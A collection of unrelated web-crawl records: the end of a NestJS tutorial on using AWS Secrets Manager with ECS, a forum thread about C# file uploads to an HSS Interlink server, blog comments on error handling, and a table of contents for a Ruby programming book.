To be able to refer to the secret values in the Elastic Container Service, we need the Amazon Resource Name (ARN) of our secret. You can find it at the top of the page.
Creating new secrets
Besides the database, we also have other sensitive information in our environment variables, such as the JWT secret key. Therefore, let’s create a new secret to hold it.
To do that, we need to click the “Store a new secret” button on the secrets page. Then, we must choose the right secret type and define key/value pairs. In the case of our JWT token, the only thing we want to store for now is the secret key.
We also need to provide our secret with a name.
Allowing the service to use our secrets
By default, our services can’t access any of our secrets. To allow that, we need to create an IAM policy with the correct permissions.
Make sure to put the correct resource names in the resources part of the above interface. You can find the Amazon Resource Name (ARN) of each secret on its page in the Secrets Manager.
We also need to give a name to our policy.
By default, AWS uses the IAM role when executing our ECS tasks.
We can create our custom IAM role containing the permissions in the and our new policy. When doing that, it’s important to select the correct use case.
We also need to provide our new role with the required permissions.
Thanks to doing the above, we can choose our new role when defining the task definition. If we do that, our service will be able to use the secrets we’ve created.
Using the secret values
The last step is to modify our task definition to use the values from the secrets manager.
To use a value from the secrets manager, we must choose ValueFrom as the value type. The most crucial thing is using the right resource name as values in our environment variables.
The resource name consists of the following parts: . By adding at the end of the resource name, we can refer to one of the keys of our secret, for example, .
Therefore, in our case, we use the following values:
Summary
In this article, we’ve increased the security of our architecture. To do that, we stored sensitive data necessary for our NestJS application to run in the AWS Secrets Manager. While doing that, we also had to create additional policies and roles so that our service would have access to the secrets. Thanks to all of the above, we’ve improved our workflow and learned more about AWS.
Series Navigation<< API with NestJS #100. The HTTPS protocol with Route 53 and AWS Certificate ManagerAPI with NestJS #102. Writing unit tests with Prisma >>
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
|
{
"url": "https://wanago.io/2023/03/27/api-nestjs-aws-secret-manager/",
"source_domain": "wanago.io",
"snapshot_id": "CC-MAIN-2024-10",
"warc_metadata": {
"Content-Length": "220226",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:MXQJFZNLK7VJK4VEWM33OGLRLZLYHUVP",
"WARC-Concurrent-To": "<urn:uuid:19a8ba72-b949-4ea1-8245-96a24eb33759>",
"WARC-Date": "2024-03-01T21:59:59Z",
"WARC-IP-Address": "78.46.91.52",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:QNIJXPHSB6EVDKWDNRQURLGVXSOZDYSR",
"WARC-Record-ID": "<urn:uuid:1a32d338-8ca7-499d-84e1-aa4f63191248>",
"WARC-Target-URI": "https://wanago.io/2023/03/27/api-nestjs-aws-secret-manager/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:f24201b9-879e-483e-83c8-15554ae853c5>"
},
"warc_info": "isPartOf: CC-MAIN-2024-10\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for February/March 2024\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-126\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.5-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
76,
77,
88,
89,
142,
143,
513,
514,
545,
546,
647,
648,
667,
668,
1089,
1090,
1343,
1344,
1846,
1847,
1861,
1862,
1970,
1971,
1990,
1991,
2042,
2043,
2201,
2202,
2271,
2272,
2277,
2278,
2386,
2387,
2406,
2407,
2543,
2544,
2580,
2581,
2831,
2832,
2919,
2920,
3170,
3171,
3375,
3376,
3408,
3409,
3612,
3613,
3634,
3635,
3795,
3796,
3967,
3968,
4116,
4117,
4202,
4203,
4372,
4373,
4394,
4395,
4565,
4566,
4808,
4809,
4857,
4858,
4898,
4899,
5034,
5035,
5220,
5221,
5264,
5265,
5329,
5330,
5482,
5483,
5551,
5552,
5715,
5716,
5740,
5741,
5832,
5833,
6014,
6015,
6173,
6174,
6227,
6228,
6236,
6237,
6621,
6622,
6780,
6790,
6800,
6806,
6817,
6834
],
"line_end_idx": [
76,
77,
88,
89,
142,
143,
513,
514,
545,
546,
647,
648,
667,
668,
1089,
1090,
1343,
1344,
1846,
1847,
1861,
1862,
1970,
1971,
1990,
1991,
2042,
2043,
2201,
2202,
2271,
2272,
2277,
2278,
2386,
2387,
2406,
2407,
2543,
2544,
2580,
2581,
2831,
2832,
2919,
2920,
3170,
3171,
3375,
3376,
3408,
3409,
3612,
3613,
3634,
3635,
3795,
3796,
3967,
3968,
4116,
4117,
4202,
4203,
4372,
4373,
4394,
4395,
4565,
4566,
4808,
4809,
4857,
4858,
4898,
4899,
5034,
5035,
5220,
5221,
5264,
5265,
5329,
5330,
5482,
5483,
5551,
5552,
5715,
5716,
5740,
5741,
5832,
5833,
6014,
6015,
6173,
6174,
6227,
6228,
6236,
6237,
6621,
6622,
6780,
6790,
6800,
6806,
6817,
6834,
6851
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 6851,
"ccnet_original_nlines": 110,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.43925926089286804,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.025925930589437485,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.12888889014720917,
"rps_doc_frac_unique_words": 0.30397236347198486,
"rps_doc_mean_word_length": 4.738341808319092,
"rps_doc_num_sentences": 77,
"rps_doc_symbol_to_word_ratio": 0.0037036999128758907,
"rps_doc_unigram_entropy": 5.018584251403809,
"rps_doc_word_count": 1158,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.04556224122643471,
"rps_doc_frac_chars_dupe_6grams": 0.027701839804649353,
"rps_doc_frac_chars_dupe_7grams": 0.010205940343439579,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.030617820098996162,
"rps_doc_frac_chars_top_3gram": 0.018589390441775322,
"rps_doc_frac_chars_top_4gram": 0.01457992009818554,
"rps_doc_books_importance": -617.3123779296875,
"rps_doc_books_importance_length_correction": -617.3123779296875,
"rps_doc_openwebtext_importance": -258.9376220703125,
"rps_doc_openwebtext_importance_length_correction": -258.9376220703125,
"rps_doc_wikipedia_importance": -180.53285217285156,
"rps_doc_wikipedia_importance_length_correction": -180.53285217285156
},
"fasttext": {
"dclm": 0.15546637773513794,
"english": 0.8987116813659668,
"fineweb_edu_approx": 1.9406890869140625,
"eai_general_math": 0.6277434825897217,
"eai_open_web_math": 0.251766562461853,
"eai_web_code": 0.9130644202232361
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.82",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "2",
"label": "Click Here References"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
7,511,750,174,298,205,000
|
Getting Error while uploading file on localhost using client application
Apr 29, 2015 at 5:54 AM
Hi,
I have two projects one is client side project and one is server side hssinterlink library project.I want to upload files from client to server and for that my client is communicating with server using webclient.UploadFile method.But i m getting internal server error plz let me know what i m doing wrong.This is my client side code-
fileName = @"D:\ms.jpg";
String guid = Guid.NewGuid().ToString();
string query = string.Empty;
string httpmethod = null;
string queryString = string.Empty;
for (int i = 0; i < 4; i++)
{
string datetime = DateTime.Now.ToString("MM/dd/yyyy HH:mm:ss", System.Globalization.DateTimeFormatInfo.InvariantInfo);
string method = null;
if (i == 0)
{
method = "Prepare";
httpmethod = "POST";
}
if (i == 1)
{
method = "CheckFileExists";
httpmethod = "GET";
}
if (i == 2)
{
method = "NewFile";
httpmethod = "GET";
}
if (i == 3)
{
method = "Append";
httpmethod = "POST";
}
if (action == "download")
queryString = datetime + ",DownloadHandler," + guid + "," + fileName + ","+ method +",Admin,Client1,1,1";
else
queryString = datetime + ",UploadHandler," + guid + "," + fileName + ","+ method +",Admin,Client1,1,1";
byte[] qbytes = UTF8Encoding.UTF8.GetBytes(queryString);
byte[] hashBytes = new System.Security.Cryptography.SHA1Managed().ComputeHash(qbytes);
byte[] data = new byte[qbytes.Length + hashBytes.Length];
Array.Copy(qbytes, data, qbytes.Length);
Array.Copy(hashBytes, 0, data, qbytes.Length, hashBytes.Length);
query = Convert.ToBase64String(data);
string url = string.Empty;
if (action == "download")
url = "http://localhost:xxx/FileDownload.ashx?d=" + query;
else
url = "http://localhost:xxx/FileUpload.ashx?u=" + query;
Uri uri = new Uri(url);
if (action == "download")
{
}
else
{
WebClient web = new WebClient();
web.UploadFile(url,httpmethod, fileName);
}
}
Thanks
Coordinator
Apr 29, 2015 at 8:25 PM
You cannot use webClient.UploadFile with HSS Interlink. WebClient UploadFile is for sending a single file directly to your web server.
HSS Interlink uses a custom, multi-step process, for delivering one or more files (including large files), asynchronously, with support for retry, and chunking.
You'll have to recreate the HSS Interlink client side from the source code, or embed the Silverlight Client included with HSS Interlink, on your web page. Or if running as a process, then use the .NET Client.
Apr 30, 2015 at 9:01 AM
Hi,
Thanks for ur response.Now i m doing the same thing I am using http response for sending files as chunk to server. I am able to create a 0 kb file on server but when i m trying to append that file i m randomly getting error on tryparsequery function can u plz help me out.
Thanks
Coordinator
Apr 30, 2015 at 9:22 AM
Not sure what we can do to help you. The product is designed to work and provide the features as outlined on the product home page. Not sure what you're trying to accomplish by stripping out the client side code.
If you want to create a new "client" side that works with the existing server side, then I recommend you read thru the Client side code and understand the protocol, the multi-steps and how they work together. Then you can re-create the logic that already exist.
If you have a more specific question, we'd be more than happy to answer.
May 1, 2015 at 2:05 PM
Hi,
Thanks for ur response,I m trying to create new client that worked with the existing server side.I have undersand the protocol and using same code to connect to server .
But when i send query to server m getting error while parsing query "format exception" in parse query method of server.I m confused Is there any format to send query string to server.I m getting that error randomly.
plz help me out
thanks
|
{
"url": "http://interlink.codeplex.com/discussions/635490",
"source_domain": "interlink.codeplex.com",
"snapshot_id": "crawl=CC-MAIN-2017-34",
"warc_metadata": {
"Content-Length": "55802",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:NTWELTAXRXITID4BKZDVMZYMEN3RMOYI",
"WARC-Concurrent-To": "<urn:uuid:51efcfea-3809-41c0-a7ae-be5ae9aaf847>",
"WARC-Date": "2017-08-20T07:59:51Z",
"WARC-IP-Address": "65.52.103.72",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:T2RCTOC44Y4AVG4BG66CD4IYRLVABRUR",
"WARC-Record-ID": "<urn:uuid:47cf46de-d82f-41d3-919c-91dfef7343dc>",
"WARC-Target-URI": "http://interlink.codeplex.com/discussions/635490",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:86c99465-01b3-4792-ba77-51d94386b786>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-145-170-239.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-34\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for August 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
73,
74,
98,
102,
439,
464,
513,
550,
584,
627,
663,
673,
804,
838,
862,
876,
912,
949,
963,
987,
1001,
1045,
1081,
1095,
1119,
1133,
1169,
1205,
1219,
1243,
1257,
1258,
1293,
1330,
1344,
1382,
1504,
1521,
1641,
1642,
1711,
1810,
1880,
1933,
2010,
2060,
2099,
2137,
2212,
2229,
2302,
2303,
2339,
2340,
2378,
2392,
2393,
2407,
2424,
2438,
2439,
2440,
2489,
2490,
2548,
2562,
2572,
2579,
2591,
2615,
2750,
2751,
2912,
2913,
3122,
3146,
3155,
3449,
3450,
3451,
3452,
3459,
3471,
3495,
3708,
3709,
3971,
3972,
4045,
4068,
4072,
4073,
4243,
4459,
4460,
4476,
4477
],
"line_end_idx": [
73,
74,
98,
102,
439,
464,
513,
550,
584,
627,
663,
673,
804,
838,
862,
876,
912,
949,
963,
987,
1001,
1045,
1081,
1095,
1119,
1133,
1169,
1205,
1219,
1243,
1257,
1258,
1293,
1330,
1344,
1382,
1504,
1521,
1641,
1642,
1711,
1810,
1880,
1933,
2010,
2060,
2099,
2137,
2212,
2229,
2302,
2303,
2339,
2340,
2378,
2392,
2393,
2407,
2424,
2438,
2439,
2440,
2489,
2490,
2548,
2562,
2572,
2579,
2591,
2615,
2750,
2751,
2912,
2913,
3122,
3146,
3155,
3449,
3450,
3451,
3452,
3459,
3471,
3495,
3708,
3709,
3971,
3972,
4045,
4068,
4072,
4073,
4243,
4459,
4460,
4476,
4477,
4483
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 4483,
"ccnet_original_nlines": 97,
"rps_doc_curly_bracket": 0.003122909925878048,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.25142207741737366,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.03071671910583973,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.33788394927978516,
"rps_doc_frac_unique_words": 0.41791045665740967,
"rps_doc_mean_word_length": 5.2835822105407715,
"rps_doc_num_sentences": 56,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.034486770629883,
"rps_doc_word_count": 536,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.012711860239505768,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.02118643932044506,
"rps_doc_frac_chars_top_3gram": 0.014830510132014751,
"rps_doc_frac_chars_top_4gram": 0.007768359966576099,
"rps_doc_books_importance": -397.9888610839844,
"rps_doc_books_importance_length_correction": -397.9888610839844,
"rps_doc_openwebtext_importance": -214.45620727539062,
"rps_doc_openwebtext_importance_length_correction": -214.45620727539062,
"rps_doc_wikipedia_importance": -163.88784790039062,
"rps_doc_wikipedia_importance_length_correction": -163.88784790039062
},
"fasttext": {
"dclm": 0.20425361394882202,
"english": 0.8121986985206604,
"fineweb_edu_approx": 1.389899492263794,
"eai_general_math": 0.6160799860954285,
"eai_open_web_math": 0.09484165906906128,
"eai_web_code": 0.6579465270042419
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.678",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-8,198,062,433,091,326,000
|
tag:blogger.com,1999:blog-1994130783874175266.post687225184060731154..comments2019-08-23T07:58:56.330+02:00Comments on bitsquid: development blog: Sensible Error Handling - Part 2Niklashttp://www.blogger.com/profile/[email protected]:blogger.com,1999:blog-1994130783874175266.post-1061980787162773472012-02-10T13:34:48.440+01:002012-02-10T13:34:48.440+01:00Choosing error codes creates new problems: * how ...Choosing error codes creates new problems: <br />* how to educate programmers who create APIs? :) <br />You can not expect world became better place if all you give is artificial SaveSystem example. The errno gives me creeps every time i remember that it exists. GetOverlappedResult anyone? Yeah I know I risk to be banned here just look at official example here (http://msdn.microsoft.com/en-us/library/windows/desktop/aa365690%28v=vs.85%29.aspx)...<br /><br />* why all those c++ libraries throw? if I am not mistaken only Google publish c++ code that does not do that.<br /><br />personally my problem with exceptions is that async execution of such things as SaveSystem become even more verbose as we need to capture all poorly documented exceptions and send back to client code.Miroslavhttps://www.blogger.com/profile/[email protected]:blogger.com,1999:blog-1994130783874175266.post-20227741422121411882012-02-07T22:28:28.340+01:002012-02-07T22:28:28.340+01:00Agreed, but such information does not necessarily ...Agreed, but such information does not necessarily have to be part of the returned error (in my opinion). It can equally well be printed to a log, since its target recipient is the human programmer.Niklashttps://www.blogger.com/profile/[email protected]:blogger.com,1999:blog-1994130783874175266.post-56630425149713982232012-02-06T16:11:47.979+01:002012-02-06T16:11:47.979+01:00I really like NSErrors from Cocoa. They encapsulat...I really like NSErrors from Cocoa. They encapsulate all the relevant information about an error:<br />- Domain ("POSIX", "CFNetwork", "AudioQueue") as a string<br />- Error code (-129, EADDRINUSE, 42)<br />- Localized, human readable error string ("The file at /foo/bar could not be opened because its volume is not mounted")<br /><br />They also have recovery options that can be displayed to the user, but I've never seen them be used...<br /><br />An API for reporting errors that does not include a human-readable string formatted for the current error (e g showing me *which* file failed to be opened) makes me very, very sad. Context is sometimes not enough to determine what on earth the error code means.nevynhttps://www.blogger.com/profile/[email protected]
|
{
"url": "http://bitsquid.blogspot.com/feeds/687225184060731154/comments/default",
"source_domain": "bitsquid.blogspot.com",
"snapshot_id": "crawl=CC-MAIN-2019-35",
"warc_metadata": {
"Content-Length": "8494",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:J6RQQ3RKCL7OLPFA7QMKWHEKAOUQ2THL",
"WARC-Concurrent-To": "<urn:uuid:90b961d3-1799-41d5-b0c3-5ca43da54058>",
"WARC-Date": "2019-08-23T09:26:19Z",
"WARC-IP-Address": "172.217.13.225",
"WARC-Identified-Payload-Type": "application/atom+xml",
"WARC-Payload-Digest": "sha1:LVOFWRR6XIAYVGCEK6YRQ3SJD2P3553H",
"WARC-Record-ID": "<urn:uuid:489e7004-4246-4690-aac0-1601b3ccfa3d>",
"WARC-Target-URI": "http://bitsquid.blogspot.com/feeds/687225184060731154/comments/default",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:3a3881e1-f206-4b3f-8210-ff5529611bc5>"
},
"warc_info": "isPartOf: CC-MAIN-2019-35\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for August 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-246.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0
],
"line_end_idx": [
2775
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2775,
"ccnet_original_nlines": 0,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.24566929042339325,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.025196850299835205,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.4000000059604645,
"rps_doc_frac_unique_words": 0.6313993334770203,
"rps_doc_mean_word_length": 7.552900791168213,
"rps_doc_num_sentences": 51,
"rps_doc_symbol_to_word_ratio": 0.009448819793760777,
"rps_doc_unigram_entropy": 4.989664077758789,
"rps_doc_word_count": 293,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.08585630357265472,
"rps_doc_frac_chars_dupe_6grams": 0.06055128946900368,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.012652509845793247,
"rps_doc_frac_chars_top_3gram": 0.01536376029253006,
"rps_doc_frac_chars_top_4gram": 0.018075009807944298,
"rps_doc_books_importance": -268.8644104003906,
"rps_doc_books_importance_length_correction": -268.8644104003906,
"rps_doc_openwebtext_importance": -102.52519226074219,
"rps_doc_openwebtext_importance_length_correction": -102.52519226074219,
"rps_doc_wikipedia_importance": -101.3704833984375,
"rps_doc_wikipedia_importance_length_correction": -101.3704833984375
},
"fasttext": {
"dclm": 0.2235814929008484,
"english": 0.7729717493057251,
"fineweb_edu_approx": 2.0178823471069336,
"eai_general_math": 0.18899095058441162,
"eai_open_web_math": 0.2575716972351074,
"eai_web_code": 0.5229865312576294
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.02",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "5",
"label": "Evaluate"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "1",
"label": "Leftover HTML"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "5",
"label": "Comment Section"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-6,186,234,822,576,737,000
|
The Well-Grounded Rubyist, Second Edition
David A. Black
• June 2014
• ISBN 9781617291692
• 536 pages
• printed in black & white
Once again, the definitive book on Ruby from David Black. A must-have!
William Wheeler, TekSystems
The Well-Grounded Rubyist, Second Edition addresses both newcomers to Ruby as well as Ruby programmers who want to deepen their understanding of the language. This beautifully written and totally revised second edition includes coverage of features that are new in Ruby 2.1, as well as expanded and updated coverage of aspects of the language that have changed.
Listen to this book in liveAudio! liveAudio integrates a professional voice recording with the book’s text, graphics, code, and exercises in Manning’s exclusive liveBook online reader. Use the text to search and navigate the audio, or download the audio-only recording for portable offline listening. You can purchase or upgrade to liveAudio here or in liveBook.
Table of Contents detailed table of contents
preface
preface to the first edition
acknowledgments
about this book
about the cover illustration
Part 1 Ruby foundations
1. Bootstrapping your Ruby literacy
1.1. Basic Ruby language literacy
1.1.1. A Ruby syntax survival kit
1.1.2. The variety of Ruby identifiers
1.1.3. Method calls, messages, and Ruby objects
1.1.4. Writing and saving a simple program
1.1.5. Feeding the program to Ruby
1.1.6. Keyboard and file I/O
1.2. Anatomy of the Ruby installation
1.2.1. The Ruby standard library subdirectory (RbConfig::CONFIG[rubylibdir])
1.2.2. The C extensions directory (RbConfig::CONFIG[archdir])
1.2.3. The site_ruby (RbConfig::CONFIG[sitedir]) and vendor_ruby (RbConfig::CONFIG[vendordir]) directories
1.2.4. The gems directory
1.3. Ruby extensions and programming libraries
1.3.1. Loading external files and extensions
1.3.2. "Load"-ing a file in the default load path
1.3.3. "Require"-ing a feature
1.3.4. require_relative
1.4. Out-of-the-box Ruby tools and applications
1.4.1. Interpreter command-line switches
1.4.2. A closer look at interactive Ruby interpretation with irb
1.4.3. ri and RDoc
1.4.4. The rake task-management utility
1.4.5. Installing packages with the gem command
1.5. Summary
2. Objects, methods, and local variables
2.1. Talking to objects
2.1.1. Ruby and object orientation
2.1.2. Creating a generic object
2.1.3. Methods that take arguments
2.1.4. The return value of a method
2.2. Crafting an object: The behavior of a ticket
2.2.1. The ticket object, behavior first
2.2.2. Querying the ticket object
2.2.3. Shortening the ticket code via string interpolation
2.2.4. Ticket availability: Expressing Boolean state in a method
2.3. The innate behaviors of an object
2.3.1. Identifying objects uniquely with the object_id method
2.3.2. Querying an object’s abilities with the respond_to? method
2.3.3. Sending messages to objects with the send method
2.4. A close look at method arguments
2.4.1. Required and optional arguments
2.4.2. Default values for arguments
2.4.3. Order of parameters and arguments
2.4.4. What you can’t do in argument lists
2.5. Local variables and variable assignment
2.5.1. Variables, objects, and references
2.5.2. References in variable assignment and reassignment
2.5.3. References and method arguments
2.5.4. Local variables and the things that look like them
2.6. Summary
3. Organizing objects with classes
3.1. Classes and instances
3.1.1. Instance methods
3.1.2. Overriding methods
3.1.3. Reopening classes
3.2. Instance variables and object state
3.2.1. Initializing an object with state
3.3. Setter methods
3.3.1. The equal sign (=) in method names
3.3.2. Syntactic sugar for assignment-like methods
3.3.3. Setter methods unleashed
3.4. Attributes and the attr_* method family
3.4.1. Automating the creation of attributes
3.4.2. Summary of attr_* methods
3.5. Inheritance and the Ruby class hierarchy
3.5.1. Single inheritance: One to a customer
3.5.3. El Viejo’s older brother: BasicObject
3.6. Classes as objects and message receivers
3.6.1. Creating class objects
3.6.2. How class objects call methods
3.6.3. A singleton method by any other name…
3.6.4. When, and why, to write a class method
3.6.5. Class methods vs. instance methods
3.7. Constants up close
3.7.1. Basic use of constants
3.7.2. Reassigning vs. modifying constants
3.8. Nature vs. nurture in Ruby objects
3.9. Summary
4. Modules and program organization
4.1. Basics of module creation and use
4.1.1. A module encapsulating "stacklikeness"
4.1.2. Mixing a module into a class
4.1.3. Using the module further
4.2. Modules, classes, and method lookup
4.2.1. Illustrating the basics of method lookup
4.2.2. Defining the same method more than once
4.2.3. How prepend works
4.2.4. The rules of method lookup summarized
4.2.5. Going up the method search path with super
4.3. The method_missing method
4.3.1. Combining method_missing and super
4.4. Class/module design and naming
4.4.1. Mix-ins and/or inheritance
4.4.2. Nesting modules and classes
4.5. Summary
5. The default object (self), scope, and visibility
5.1. Understanding self, the current/default object
5.1.1. Who gets to be self, and where
5.1.2. The top-level self object
5.1.3. Self inside class, module, and method definitions
5.1.4. Self as the default receiver of messages
5.1.5. Resolving instance variables through self
5.2. Determining scope
5.2.1. Global scope and global variables
5.2.2. Local scope
5.2.3. The interaction between local scope and self
5.2.4. Scope and resolution of constants
5.2.5. Class variable syntax, scope, and visibility
5.3. Deploying method-access rules
5.3.1. Private methods
5.3.2. Protected methods
5.4. Writing and using top-level methods
5.4.1. Defining a top-level method
5.4.2. Predefined (built-in) top-level methods
5.5. Summary
6. Control-flow techniques
6.1. Conditional code execution
6.1.1. The if keyword and friends
6.1.2. Assignment syntax in condition bodies and tests
6.1.3. case statements
6.2. Repeating actions with loops
6.2.1. Unconditional looping with the loop method
6.2.2. Conditional looping with the while and until keywords
6.2.3. Looping based on a list of values
6.3. Iterators and code blocks6.3.1. The ingredients of iteration
6.3.1. Iteration, home-style
6.3.2. The anatomy of a method call
6.3.3. Curly braces vs. do/end in code block syntax
6.3.4. Implementing times
6.3.5. The importance of being each
6.3.6. From each to map
